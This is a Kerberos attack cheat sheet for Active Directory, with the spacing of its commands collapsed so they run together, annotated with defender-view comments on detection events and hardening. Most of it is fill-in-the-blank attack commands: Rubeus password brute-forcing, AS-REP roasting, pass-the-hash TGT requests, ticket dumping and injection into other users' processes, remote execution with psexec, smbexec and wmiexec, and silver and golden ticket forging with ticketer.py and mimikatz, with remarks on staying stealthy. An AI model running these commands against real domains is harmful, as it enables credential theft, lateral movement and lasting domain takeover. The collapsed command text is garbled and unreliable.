# NOTE(review): defender view - failed Kerberos pre-authentication is logged on
# domain controllers as event 4771 (plus failed 4768 requests), not as 4625
# logon failures. Alert on bursts from a single source and confirm that the
# account lockout policy is actually applied to these attempts.
# with a list of users.\Rubeus.exebrute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exebrute/passwords:<passwords_file>/outfile:<output_file>
# NOTE(review): defender view - AS-REP roasting only applies to accounts that
# have "Do not require Kerberos preauthentication" set. Audit for that flag,
# clear it wherever possible, and give any account that must keep it a long
# random password. Event 4768 with pre-authentication type 0 is the usual
# detection signal on the domain controller.
# check ASREPRoast for all domain users (credentials required)pythonGetNPUsers.py<domain_name>/<domain_user>:<domain_user_password>-request-format<AS_REP_responses_format [hashcat |john]> -outputfile<output_AS_REP_responses_file># check ASREPRoast for a list of users (no credentials required)pythonGetNPUsers.py<domain_name>/-usersfile<users_file>-format<AS_REP_responses_format [hashcat |john]> -outputfile<output_AS_REP_responses_file>
# check ASREPRoast for all users in current domain.\Rubeus.exeasreproast/format:<AS_REP_responses_format [hashcat |john]> /outfile:<output_hashes_file>
# NOTE(review): defender view - a TGT requested from a hash or key is recorded
# as an ordinary event 4768. In a domain where AES is the norm, an RC4 (0x17)
# ticket encryption type in that event is the anomaly worth alerting on, which
# is why the text below calls the AES variant less conspicuous. Disabling RC4
# for Kerberos where compatibility allows removes the NT-hash variant entirely.
# The remote-execution tools listed here typically leave host-side traces
# (service installation, events 7045/4697, or WMI activity) on the target.
# Request the TGT with hashpythongetTGT.py<domain_name>/<user_name>-hashes [lm_hash]:<ntlm_hash># Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)pythongetTGT.py<domain_name>/<user_name>-aesKey<aes_key># Request the TGT with passwordpythongetTGT.py<domain_name>/<user_name>:[password]# If not provided, password is asked# Set the TGT for impacket useexport KRB5CCNAME=<TGT_ccache_file># Execute remote commands with any of the following by using the TGTpythonpsexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonsmbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonwmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass
# Ask and inject the ticket.\Rubeus.exeasktgt/domain:<domain_name>/user:<user_name>/rc4:<ntlm_hash>/ptt# Execute a cmd in the remote machine.\PsExec.exe-accepteula \\<remote_hostname>cmd
Pass The Ticket (PTT)
Harvest tickets from Linux
Check type and location of tickets:
grepdefault_ccache_name/etc/krb5.conf
If nothing is returned, the default is FILE:/tmp/krb5cc_%{uid}.
If the tickets are stored as files, you can copy them (if you have the permissions) in order to use them.
If the tickets are stored in a KEYRING, you can use tickey to get them:
# NOTE(review): defender view - the comment below describes injecting into
# other users' processes and staging the binary in a directory every user can
# reach. Mounting /tmp noexec and auditing process-attach (presumably ptrace -
# confirm against the tool) and new executables in shared directories are the
# relevant hardening and detection points.
# To dump current user tickets, if root, try to dump them all by injecting in other user processes# to inject, copy tickey in a reachable folder by all userscptickey/tmp/tickey/tmp/tickey-i
# NOTE(review): defender view - ticket theft from a Windows host is bounded by
# which accounts have logged on there. Tiered administration (privileged
# accounts never log on to lower-trust hosts) and the Protected Users group
# (short, non-renewable TGT lifetime) reduce what can be harvested.
.\Rubeusdump# After dump with Rubeus tickets in base64, to write the in a file[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
# NOTE(review): defender view - a reused ticket authenticates as a normal
# Kerberos logon, so the reliable signals are on the target host: service
# installation (events 7045/4697) for the psexec/smbexec style tools, WMI
# process creation for wmiexec, and a logon from a source host the account
# does not normally use.
# Set the ticket for impacket useexport KRB5CCNAME=<TGT_ccache_file_path># Execute remote commands with any of the following by using the TGTpythonpsexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonsmbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonwmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass
# NOTE(review): defender view - a forged service ticket is built from the
# service account's own key and never passes through the KDC, so the domain
# controllers log no 4769 for it; detection has to happen on the target host
# (logons with no matching ticket request, odd user/group data in 4624).
# Mitigations: rotate service and computer account passwords, prefer group
# managed service accounts, and enable PAC validation where it is supported.
# To generate the TGS with NTLMpythonticketer.py-nthash<ntlm_hash>-domain-sid<domain_sid>-domain<domain_name>-spn<service_spn><user_name># To generate the TGS with AES keypythonticketer.py-aesKey<aes_key>-domain-sid<domain_sid>-domain<domain_name>-spn<service_spn><user_name># Set the ticket for impacket useexport KRB5CCNAME=<TGS_ccache_file># Execute remote commands with any of the following by using the TGTpythonpsexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonsmbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonwmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass
# To generate the TGS with NTLMmimikatz# kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname># To generate the TGS with AES 128 keymimikatz# kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname># To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)mimikatz# kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname># Inject TGS with Mimikatzmimikatz# kerberos::ptt <ticket_kirbi_file>
# NOTE(review): defender view - a forged TGT depends on the krbtgt key, so it
# stays valid until that key is rotated; recovery after a suspected compromise
# means resetting the krbtgt password twice (the previous key is still
# accepted after a single reset). Detection signals: service ticket requests
# (4769) with no preceding 4768 for the account, ticket lifetimes longer than
# the domain policy allows, and RC4 tickets in an AES-only environment.
# To generate the TGT with NTLMpythonticketer.py-nthash<krbtgt_ntlm_hash>-domain-sid<domain_sid>-domain<domain_name><user_name># To generate the TGT with AES keypythonticketer.py-aesKey<aes_key>-domain-sid<domain_sid>-domain<domain_name><user_name># Set the ticket for impacket useexport KRB5CCNAME=<TGS_ccache_file># Execute remote commands with any of the following by using the TGTpythonpsexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonsmbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonwmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass
# To generate the TGT with NTLMmimikatz# kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name># To generate the TGT with AES 128 keymimikatz# kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name># To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)mimikatz# kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name># Inject TGT with Mimikatzmimikatz# kerberos::ptt <ticket_kirbi_file>